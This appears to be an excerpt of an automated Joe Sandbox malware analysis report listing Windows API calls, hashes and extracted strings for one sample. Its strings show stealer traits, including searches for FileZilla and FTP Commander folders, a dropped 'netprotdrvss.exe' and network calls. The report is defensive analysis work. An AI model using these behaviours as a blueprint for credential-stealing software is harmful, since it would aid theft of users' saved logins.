                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateHandleInitializeModuleWindow
                                                                                                                                                                                                                • String ID: AtlAxWin$Shell.Explorer
                                                                                                                                                                                                                • API String ID: 950422046-1300462704
                                                                                                                                                                                                                • Opcode ID: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
                                                                                                                                                                                                                • Instruction ID: 8885d0d040d3ab3e1edd42f45155a7fe84e7bff231f75e8e802cb7627400a982
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 78118F30200200FFD320ABA6CC4CE6B7BBCEFCA711B240579F515EB291D7789801CA65
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040286E), ref: 004072F9
                                                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00407337
                                                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 00407341
                                                                                                                                                                                                                • __aulldiv.LIBCMT ref: 00407359
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Time$System$File$__aulldiv
                                                                                                                                                                                                                • String ID: n(@
                                                                                                                                                                                                                • API String ID: 3735792614-2525614082
                                                                                                                                                                                                                • Opcode ID: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
                                                                                                                                                                                                                • Instruction ID: 0875687ad9f8fbdff1f190dbab39d4211c2ed1a8acd2afdabfbd9ccbaffc37b8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 83011A66D2022DAACF00DBE5DD44CEFB7BCFF44344B04051AE901B3210E7B5A648CBA9
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040AB93
                                                                                                                                                                                                                • CharLowerW.USER32(?), ref: 0040ABA0
                                                                                                                                                                                                                • GetCommandLineW.KERNEL32 ref: 0040ABC0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CharCommandFileLineLowerModuleName
                                                                                                                                                                                                                • String ID: /updatefile3$netprotdrvss.exe
                                                                                                                                                                                                                • API String ID: 3118597399-3449771660
                                                                                                                                                                                                                • Opcode ID: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
                                                                                                                                                                                                                • Instruction ID: 1eba2a713c21f7c79877a49aa3ec6850c44e44909145826ab611dd80b60fa5a6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41E09B3655021A5AD750FBB1DD07BA633ACFB01705F1049B6A246F10C0EE74D55D4F9D
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00409FCE
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00409FDE
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                                                                                                                                                                                                                • DispatchMessageW.USER32(?), ref: 0040A009
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CountMessageTick$DispatchPeekSleep
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4159783438-0
                                                                                                                                                                                                                • Opcode ID: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
                                                                                                                                                                                                                • Instruction ID: c0dc46c0c87f7bc49602bd7d2efae9f565a6f52602c3eafe7569a8fa2f6b8eea
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F118671D103199ECB10AFF5CC8899F7BB9BB45314B144A7AE161F71E0C778CA118B1A
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00409F5B
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00409F5F
                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                                                                                                                                                                                                                • DispatchMessageW.USER32(?), ref: 00409F80
                                                                                                                                                                                                                • Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CountMessageTick$DispatchPeekSleep
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4159783438-0
                                                                                                                                                                                                                • Opcode ID: 57f1528c1cf960ce56ea9ee11f0e0f6d2bf2bfe74b8bc540e63205e3b9b5f8f9
                                                                                                                                                                                                                • Instruction ID: 2f378a1af0056e794f94b22e0cd08b0b0b180d2e60cd5d2ebdc62f673b65dbb1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 57f1528c1cf960ce56ea9ee11f0e0f6d2bf2bfe74b8bc540e63205e3b9b5f8f9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1F0C872D042149BD714B7F2DD09B7D76A89B45714F104A36F551F70D1CA7CCD148A58
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                                                                                                                                                                                                                  • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                                                                                                                                                                                                                  • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5B
                                                                                                                                                                                                                  • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5F
                                                                                                                                                                                                                  • Part of subcall function 00409F2B: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                                                                                                                                                                                                                  • Part of subcall function 00409F2B: DispatchMessageW.USER32(?), ref: 00409F80
                                                                                                                                                                                                                  • Part of subcall function 00409F2B: Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
                                                                                                                                                                                                                • CharLowerW.USER32(?,?,?,00423DD4,?,00000001), ref: 00408751
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 0040875A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CountInternetMessageTick$CharDispatchFreeLowerOpenOptionPeekSleepString
                                                                                                                                                                                                                • String ID: http://$+@
                                                                                                                                                                                                                • API String ID: 147727044-3628382792
                                                                                                                                                                                                                • Opcode ID: a6511d5d8b0c810daf140c5c911559c37a96c1275369982660b5569d586a1c5f
                                                                                                                                                                                                                • Instruction ID: 305e6509dfdc939f3ffb47eba37a7af79922f54013ecb7534e3961c93d2e4cc1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a6511d5d8b0c810daf140c5c911559c37a96c1275369982660b5569d586a1c5f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E41D5729002199BCF15AF66CD056EFBBB4FF44314F20447FE981B3292DB3889528B99
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00414F68,00000000,00000000,00000000,UniqueNum,00000001), ref: 00407E09
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000078,00000064,00000001,00000000), ref: 00407E20
                                                                                                                                                                                                                  • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                                                                                                                                                                                                                  • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$CreateModuleNamePointerWrite
                                                                                                                                                                                                                • String ID: UniqueNum$x
                                                                                                                                                                                                                • API String ID: 594998759-2399716736
                                                                                                                                                                                                                • Opcode ID: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
                                                                                                                                                                                                                • Instruction ID: 8c5cde1ed6458afa5e70834db293a7f07ca8c6efd1b8e13f0da2095665a79c5a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F72129329002186BDF04AB74ED49DDF3B69EF44315F104636FA02E71E1E634D951C799
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 0040413A
                                                                                                                                                                                                                  • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                                                                                                                                                                                                                  • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                                                                                                                                                                                                                  • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                                                                                                                                                                                                                  • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                                                                                                                                                                                                                  • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                                                                                                                                                                                                                  • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                                                                                                                                                                                                                  • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                                                                                                                                                                                                                • String ID: #$&$*filezilla*
                                                                                                                                                                                                                • API String ID: 3438805939-758400021
                                                                                                                                                                                                                • Opcode ID: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
                                                                                                                                                                                                                • Instruction ID: af0dd5899ef73ee7264a7e51d90439c8fcf38b6470501fb51340e8e2557856c3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E1151B2901128BADB10EA92DC49EDF7BBCEF85304F00407AF605B6080E7385785CBE9
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 00404AE5
                                                                                                                                                                                                                  • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                                                                                                                                                                                                                  • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                                                                                                                                                                                                                  • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                                                                                                                                                                                                                  • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                                                                                                                                                                                                                  • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                                                                                                                                                                                                                  • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                                                                                                                                                                                                                  • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                                                                                                                                                                                                                • String ID: #$&$ftp*commander*
                                                                                                                                                                                                                • API String ID: 3438805939-1149875651
                                                                                                                                                                                                                • Opcode ID: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
                                                                                                                                                                                                                • Instruction ID: 4761086559ade70d73b1403ca51e5d3bc462c500c99379e4fd01d7d946a964d6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B61121B2901118BADB10AA92DC49EDF7F7CEF85704F00407AF609B6180E7799785CBA9
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 004094A9
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 004094AE
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FreeString
                                                                                                                                                                                                                • String ID: _blank$an.yandex.ru/count
                                                                                                                                                                                                                • API String ID: 3341692771-25359924
                                                                                                                                                                                                                • Opcode ID: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                                                                                                                                                                                                                • Instruction ID: 1eacecae91598e8b756cf85833a4a3bbf756f1dfdfc5fa02fd6c22f827bf3b29
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 28015A35204114BBDB109FA6CD05D9B77A8EF85324724443BBC15E7291E779EE02CA69
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00001000,?,?,00407E44,00000001,UniqueNum), ref: 00407D15
                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$CreateCurrentDirectoryModuleName
                                                                                                                                                                                                                • String ID: \merocz.xc6
                                                                                                                                                                                                                • API String ID: 3818821825-505599559
                                                                                                                                                                                                                • Opcode ID: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
                                                                                                                                                                                                                • Instruction ID: bb9f2ddab4bab237696810683399403c99d26191ea9c434de7a02090ea9b9a12
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA01A231904224ABE7309B569C49FEB77ADEF85710F00447FB505F20D1D6749A80CAAA
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00409868
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00409876
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocString
                                                                                                                                                                                                                • String ID: "URL"$"encrypted"
                                                                                                                                                                                                                • API String ID: 2525500382-4151690107
                                                                                                                                                                                                                • Opcode ID: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
                                                                                                                                                                                                                • Instruction ID: 961e294ab5ae80d7ab2f0271a6faa46f3ea3f555f1d55132cdad114d364c87da
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62F0D671A0021DA7CF00AB69CC01FD637ECAB4438CF1484B6F904F32C1E974EA098B98
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 004097ED
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 004097FB
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocString
                                                                                                                                                                                                                • String ID: "domain"$"url"
                                                                                                                                                                                                                • API String ID: 2525500382-2438671658
                                                                                                                                                                                                                • Opcode ID: 98133a6a8bfb7a18a2a86276567a63b94d588fd2e230135a268bf1c7eb2bd3b5
                                                                                                                                                                                                                • Instruction ID: 610bf4d9b2292206f8ef054453b19a236663fc5a2da35db14ea77673b97cd822
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 98133a6a8bfb7a18a2a86276567a63b94d588fd2e230135a268bf1c7eb2bd3b5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08F0A271A0021DA6CF41AAA9CC05FD637E8AB44348F1444B6F908F7281EA78EA188B94
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Internet Explorer,00000000,00000001,00000000,?,?,00402C77), ref: 00406C91
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Open
                                                                                                                                                                                                                • String ID: Build$SOFTWARE\Microsoft\Internet Explorer$w,@
                                                                                                                                                                                                                • API String ID: 71445658-3061378640
                                                                                                                                                                                                                • Opcode ID: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                                                                                                                                                                                                                • Instruction ID: 930cfdd3d9e2cf302383723a85cc45ac24d6ba1b6d45bcf7a76994dd36721e6e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FBE08672664218FAEF009B929C07FDA77ACDB00758F20086AF502F10C1DAB5F714D6AC
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                                                                                                                                                                                                                  • Part of subcall function 0040845D: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000008,00000000,?,?,004084C5,?,?,?,00000008,?,00403796,?), ref: 00408475
                                                                                                                                                                                                                  • Part of subcall function 0040845D: RegCloseKey.ADVAPI32(?,?,004084C5,?,?,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408484
                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408524
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408534
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 0040853B
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
